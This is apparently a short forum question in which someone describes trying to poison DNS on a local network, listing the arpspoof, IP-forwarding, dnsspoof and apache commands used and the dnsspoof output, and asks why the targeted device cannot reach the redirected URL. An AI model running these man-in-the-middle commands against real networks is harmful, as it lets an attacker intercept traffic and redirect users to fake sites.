I’ve tried to DNS spoof
dnsspoof -i eth0 -f spoofhosts.txt
(inside spoofhosts.txt there is my (the attacker) local ip and the domain which i want to poison)
and I just keep receiving this:
dnsspoof: listening on eth0 [udp dst port 53 and not src 10.0.0.11]
10.0.0.3.58451 > 10.0.0.138.53: 60823+ A? urlblablabla.com
When I try to enter to the URL in the hosts.txt
from my other device that I attacked, the URL can’t be reached.
I have already done these steps:
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t //ATTACKED-IP// //Router//
arpspoof -i eth0 -t //Router// //ATTACKED-IP//
service apache2 start